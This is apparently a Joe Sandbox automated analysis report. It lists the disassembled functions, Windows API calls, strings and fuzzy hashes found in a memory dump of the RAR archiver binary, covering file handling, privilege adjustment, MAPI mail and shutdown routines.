String ID: %12ls: %ls$%12ls: %ls$%21ls %-16ls %u$%21ls %9ls %3d%% %-27ls %u$%s: $%s: %s$----------- --------- -------- ----- ---------- ----- -------- ----$----------- --------- ---------- ----- ----$%.10ls %u$%21ls %18s %lu$%21ls %9ls %3d%% %28ls %u$%s%s$%s%s$%s%s$%s%s$%s%s$%s%s$%s%s$EOF$RAR 1.4$RAR 4$RAR 5$V
API String ID: 668332963-4283793440
Opcode ID: cff16b410779efd6418cbb4bfaefd77790891fdcb5da60b35bb77876aa469163
Instruction ID: 0e58024737e02f621b02074d7ca948c665a913afc3a212ce73d89d006cef94c8
Opcode Fuzzy Hash: cff16b410779efd6418cbb4bfaefd77790891fdcb5da60b35bb77876aa469163
Instruction Fuzzy Hash: F322822AA086C245FB20FB24D4400F9A7A2FF55744FC45037D66F47AEADE2DE606C7A0

Function 00007FF7F7E9D2C0 Relevance: 23.1, APIs: 9, Strings: 4, Instructions: 313fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 00007FF7F7E9D4A6
CloseHandle.KERNEL32 ref: 00007FF7F7E9D4B9

Part of subcall function 00007FF7F7E9EF50: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7F7E9EE47), ref: 00007FF7F7E9EF73
Part of subcall function 00007FF7F7E9EF50: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,00007FF7F7E9EE47), ref: 00007FF7F7E9EF84
Part of subcall function 00007FF7F7E9EF50: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF7F7E9EFA7
Part of subcall function 00007FF7F7E9EF50: AdjustTokenPrivileges.ADVAPI32 ref: 00007FF7F7E9EFCA
Part of subcall function 00007FF7F7E9EF50: GetLastError.KERNEL32 ref: 00007FF7F7E9EFD4
Part of subcall function 00007FF7F7E9EF50: CloseHandle.KERNEL32 ref: 00007FF7F7E9EFE7

CreateDirectoryW.KERNEL32 ref: 00007FF7F7E9D4C6
CreateFileW.KERNEL32 ref: 00007FF7F7E9D64A
DeviceIoControl.KERNEL32 ref: 00007FF7F7E9D68B
CloseHandle.KERNEL32 ref: 00007FF7F7E9D69A
GetLastError.KERNEL32 ref: 00007FF7F7E9D6AD
RemoveDirectoryW.KERNEL32 ref: 00007FF7F7E9D6FA
DeleteFileW.KERNEL32 ref: 00007FF7F7E9D705

Part of subcall function 00007FF7F7EA2310: FlushFileBuffers.KERNEL32 ref: 00007FF7F7EA233E
Part of subcall function 00007FF7F7EA2310: SetFileTime.KERNEL32 ref: 00007FF7F7EA23DB

Part of subcall function 00007FF7F7EA1930: FindCloseChangeNotification.KERNELBASE ref: 00007FF7F7EA1958

Part of subcall function 00007FF7F7EA39E0: SetFileAttributesW.KERNEL32(?,00007FF7F7EA34EE,?,?,?,?,00000800,00000000,00000000,00007FF7F7EB38CB,?,?,?,00007FF7F7EB41EC), ref: 00007FF7F7EA3A0F
Part of subcall function 00007FF7F7EA39E0: SetFileAttributesW.KERNEL32(?,00007FF7F7EA34EE,?,?,?,?,00000800,00000000,00000000,00007FF7F7EB38CB,?,?,?,00007FF7F7EB41EC), ref: 00007FF7F7EA3A3C

Strings

SeRestorePrivilege, xrefs: 00007FF7F7E9D31C
SeCreateSymbolicLinkPrivilege, xrefs: 00007FF7F7E9D328
UNC\, xrefs: 00007FF7F7E9D3BD
\??\, xrefs: 00007FF7F7E9D390

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: File$Close$CreateHandle$AttributesDirectoryErrorLastProcessToken$AdjustBuffersChangeControlCurrentDeleteDeviceFindFlushLookupNotificationOpenPrivilegePrivilegesRemoveTimeValue
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 2827264287-3508440684
Opcode ID: 1a7d86559847920f8bb109ab3d7291439b8a259b3f48a060f5ee007c4e7161c6
Instruction ID: b7112cfe0c8a30db4440cf0878d5d85e047f3c3546947055c37aa60e32a5876f
Opcode Fuzzy Hash: 1a7d86559847920f8bb109ab3d7291439b8a259b3f48a060f5ee007c4e7161c6
Instruction Fuzzy Hash: ACD1B32AA1869695EB20EF20D8506F9B7B0FB44798FC04132DA6E476D5DF3CD507C7A0

Function 00007FF7F7ECAE50 Relevance: 23.0, APIs: 8, Strings: 5, Instructions: 281libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF7F7E82E4C), ref: 00007FF7F7ECAEE9
GetProcAddress.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF7F7E82E4C), ref: 00007FF7F7ECAF01
GetProcAddress.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF7F7E82E4C), ref: 00007FF7F7ECAF19
GetCurrentDirectoryW.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF7F7E82E4C), ref: 00007FF7F7ECAF75
GetFullPathNameA.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF7F7E82E4C), ref: 00007FF7F7ECAFB0
SetCurrentDirectoryW.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF7F7E82E4C), ref: 00007FF7F7ECB23B
FreeLibrary.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF7F7E82E4C), ref: 00007FF7F7ECB244
FreeLibrary.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF7F7E82E4C), ref: 00007FF7F7ECB287

Strings

MAPISendMail, xrefs: 00007FF7F7ECAEDF
MAPI32.DLL, xrefs: 00007FF7F7ECAEC2
MAPIFreeBuffer, xrefs: 00007FF7F7ECAF0F
SMTP:, xrefs: 00007FF7F7ECB069
MAPIResolveName, xrefs: 00007FF7F7ECAEF7

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: AddressProc$CurrentDirectoryFreeLibrary$FullNamePath
String ID: MAPI32.DLL$MAPIFreeBuffer$MAPIResolveName$MAPISendMail$SMTP:
API String ID: 3483800833-4165214152
Opcode ID: 8f878c9cc2ffebf2ccf382536ffbb2373ba61f84303543efc970922cd888523d
Instruction ID: 188e8c1e13a6bd989bdeaf7c4dc9a535e126e8154a6b847d276f3a1305a488f3
Opcode Fuzzy Hash: 8f878c9cc2ffebf2ccf382536ffbb2373ba61f84303543efc970922cd888523d
Instruction Fuzzy Hash: 7AC18F2AA09A8285EB14EF21E8502EDB7A0FB44794F844036DA6E47BD5DF3CD546C790

Function 00007FF7F7ECB57C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54shutdownCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF7F7ECB593
OpenProcessToken.ADVAPI32 ref: 00007FF7F7ECB5A6
LookupPrivilegeValueW.ADVAPI32 ref: 00007FF7F7ECB5BE
AdjustTokenPrivileges.ADVAPI32 ref: 00007FF7F7ECB5EF
ExitWindowsEx.USER32 ref: 00007FF7F7ECB602
ExitWindowsEx.USER32 ref: 00007FF7F7ECB637

Strings

SeShutdownPrivilege, xrefs: 00007FF7F7ECB5B7

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: ExitProcessTokenWindows$AdjustCurrentLookupOpenPrivilegePrivilegesValue
String ID: SeShutdownPrivilege
API String ID: 3729174658-3733053543
Opcode ID: fa1b4f4939311264a597a3e156d3f94e3144e33e257b2b707d9ae949dbaf0abe
Instruction ID: 796b36e25346c44341ed11a745bd0aed98673fe480ad0a5321c561e106252c7b
Opcode Fuzzy Hash: fa1b4f4939311264a597a3e156d3f94e3144e33e257b2b707d9ae949dbaf0abe
Instruction Fuzzy Hash: D621A839A1865282F750EB20E4557BAF361EB84704FD05036D56F469D4CF3DD447C7A0

Function 00007FF7F7E9E21C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 148fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,?,00000001,?,00007FF7F7E82014), ref: 00007FF7F7E9E298
FindClose.KERNEL32(?,?,?,00000001,?,00007FF7F7E82014), ref: 00007FF7F7E9E2AB
CreateFileW.KERNEL32(?,?,?,00000001,?,00007FF7F7E82014), ref: 00007FF7F7E9E2F7

Part of subcall function 00007FF7F7E9EF50: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7F7E9EE47), ref: 00007FF7F7E9EF73
Part of subcall function 00007FF7F7E9EF50: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,00007FF7F7E9EE47), ref: 00007FF7F7E9EF84
Part of subcall function 00007FF7F7E9EF50: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF7F7E9EFA7
Part of subcall function 00007FF7F7E9EF50: AdjustTokenPrivileges.ADVAPI32 ref: 00007FF7F7E9EFCA
Part of subcall function 00007FF7F7E9EF50: GetLastError.KERNEL32 ref: 00007FF7F7E9EFD4
Part of subcall function 00007FF7F7E9EF50: CloseHandle.KERNEL32 ref: 00007FF7F7E9EFE7

DeviceIoControl.KERNEL32 ref: 00007FF7F7E9E357
CloseHandle.KERNEL32(?,?,?,00000001,?,00007FF7F7E82014), ref: 00007FF7F7E9E362

Strings

SeBackupPrivilege, xrefs: 00007FF7F7E9E27E

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: Close$FileFindHandleProcessToken$AdjustControlCreateCurrentDeviceErrorFirstLastLookupOpenPrivilegePrivilegesValue
String ID: SeBackupPrivilege
API String ID: 3094086963-2429070247
Opcode ID: 6b1f5dc95f58b75a03985b82b44585fe4ffe7301fcc115945b13fd181dcb0710
Instruction ID: 6066a510d43b3103bcd6421e651339d2a19ff239e27c6af4391c7e0dfced45bb
Opcode Fuzzy Hash: 6b1f5dc95f58b75a03985b82b44585fe4ffe7301fcc115945b13fd181dcb0710
Instruction Fuzzy Hash: 3A61813BA0868186E714AB25E4846F9A3B0FB447A4FC04236DBBF16AD4DF3CD556C790

Function 00007FF7F7EBAF0C Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 427COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 00007FF7F7EBAFA0

Part of subcall function 00007FF7F7ECB6D0: Sleep.KERNEL32(?,?,?,?,00007FF7F7E9CBED,?,00000000,?,00007FF7F7EC7A8C), ref: 00007FF7F7ECB730

swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7F7EBB185
new.LIBCMT ref: 00007FF7F7EBB18F

Strings

%ls%0*u.rev, xrefs: 00007FF7F7EBB170
, xrefs: 00007FF7F7EBB2B6

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: Sleepswprintf
String ID: $%ls%0*u.rev
API String ID: 407366315-3491873314
Opcode ID: be504934a9b1dd2da099aac91cc6efeb4d9364db6ee78d320e7c6c33f3a06880
Instruction ID: 9209fce3c26ddb2f3172472b6a15714791542f4861042f9e4c1858090261a6d5
Opcode Fuzzy Hash: be504934a9b1dd2da099aac91cc6efeb4d9364db6ee78d320e7c6c33f3a06880
Instruction Fuzzy Hash: F902053AA0468286EB20EB29E4445ADF7A5FB88784F800137DE6E477D5DE3CE446C790

Function 00007FF7F7E849B8 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 372COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 00007FF7F7E84BD8

Part of subcall function 00007FF7F7ECB6D0: Sleep.KERNEL32(?,?,?,?,00007FF7F7E9CBED,?,00000000,?,00007FF7F7EC7A8C), ref: 00007FF7F7ECB730

Part of subcall function 00007FF7F7EA1E80: CreateFileW.KERNELBASE ref: 00007FF7F7EA1F4A
Part of subcall function 00007FF7F7EA1E80: GetLastError.KERNEL32 ref: 00007FF7F7EA1F59
Part of subcall function 00007FF7F7EA1E80: CreateFileW.KERNELBASE ref: 00007FF7F7EA1F99
Part of subcall function 00007FF7F7EA1E80: GetLastError.KERNEL32 ref: 00007FF7F7EA1FA2
Part of subcall function 00007FF7F7EA1E80: SetFileTime.KERNEL32 ref: 00007FF7F7EA1FF1

Strings

%12s %s, xrefs: 00007FF7F7E84E8E
%12s %s, xrefs: 00007FF7F7E84E58
%s, xrefs: 00007FF7F7E84EAF
, xrefs: 00007FF7F7E84F01

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: File$CreateErrorLast$SleepTime
String ID: %12s %s$%12s %s$ $%s
API String ID: 2965465231-221484280
Opcode ID: e455637c68bc7564410924072a6d36a8d2fc6e2fd6ac8c4536b249eeb429af35
Instruction ID: 375393d33d49e1eea99947c082600d89e4fc66ec195d70e1a7a2f37582a3fe10
Opcode Fuzzy Hash: e455637c68bc7564410924072a6d36a8d2fc6e2fd6ac8c4536b249eeb429af35
Instruction Fuzzy Hash: 5AF1BF2AB0968685EB60EF12D0402BDA7A1FB45B84FC44037DA6E0B7D5DF3CD55AC790

Function 00007FF7F7EE4C10 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF7F7EE4C89
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF7F7EE4CA1
RtlVirtualUnwind.KERNEL32 ref: 00007FF7F7EE4CDC
IsDebuggerPresent.KERNEL32 ref: 00007FF7F7EE4D15
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF7F7EE4D1F
UnhandledExceptionFilter.KERNEL32 ref: 00007FF7F7EE4D2A

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 63ae987077db39b18cf30f3f9a6d60a5092a8d8f4155411af1d7abcba61ca722
Instruction ID: 79720ad47e567d6ba9e955f4a90a4899247e57077898e7b80e56c8a0aad031cf
Opcode Fuzzy Hash: 63ae987077db39b18cf30f3f9a6d60a5092a8d8f4155411af1d7abcba61ca722
Instruction Fuzzy Hash: 9231863A608B8186DB60DF25E8402EDB3A4FB85754F940136EAAE43B94DF3CD546CB50

Function 00007FF7F7E9EF50 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7F7E9EE47), ref: 00007FF7F7E9EF73
OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,00007FF7F7E9EE47), ref: 00007FF7F7E9EF84
LookupPrivilegeValueW.ADVAPI32 ref: 00007FF7F7E9EFA7
AdjustTokenPrivileges.ADVAPI32 ref: 00007FF7F7E9EFCA
GetLastError.KERNEL32 ref: 00007FF7F7E9EFD4
CloseHandle.KERNEL32 ref: 00007FF7F7E9EFE7

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
String ID:
API String ID: 3398352648-0
Opcode ID: a68743f79c0fdba85814f3f902c484d9b924ee88fd84a1759920b380f60e4056
Instruction ID: 8dab29ad4c9b014bb483c206ab4122bd06670328fcc8eb62a9dee08561c82e47
Opcode Fuzzy Hash: a68743f79c0fdba85814f3f902c484d9b924ee88fd84a1759920b380f60e4056
Instruction Fuzzy Hash: 6611753661874182E7509F21F84056AB3B0FB88B84FC44437EAAF43A94DF3CD006CB90

Function 00007FF7F7E842E0 Relevance: 6.3, APIs: 4, Instructions: 344COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7F7E872C4: new.LIBCMT ref: 00007FF7F7E873DE

Part of subcall function 00007FF7F7E88010: SetLastError.KERNEL32 ref: 00007FF7F7E8803D

new.LIBCMT ref: 00007FF7F7E8448C
new.LIBCMT ref: 00007FF7F7E844C5
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7F7E84573
_CxxThrowException.LIBVCRUNTIME ref: 00007FF7F7E84584

Part of subcall function 00007FF7F7E9CA40: _CxxThrowException.LIBVCRUNTIME ref: 00007FF7F7E9CEDE

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: ExceptionThrow$ErrorLaststd::bad_alloc::bad_alloc
String ID:
API String ID: 3116915952-0
Opcode ID: ca3bb635289236c8f91ef8656bb3d77759dfc4cba9f1f81f5f4e0259b259522b
Instruction ID: fd0e860678c6340e2b964689b7d70e6ec643020866443c3c29d5e86b1fc81e3e
Opcode Fuzzy Hash: ca3bb635289236c8f91ef8656bb3d77759dfc4cba9f1f81f5f4e0259b259522b
Instruction Fuzzy Hash: 0EE14D2AA18AC281EB20FB25E4505FDA3A1FB85794F845033DE6E077D6DE3CD506C7A0

Function 00007FF7F7E88884 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 324COMMON

Download Yara Rule

Strings

CMT, xrefs: 00007FF7F7E88D2A

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

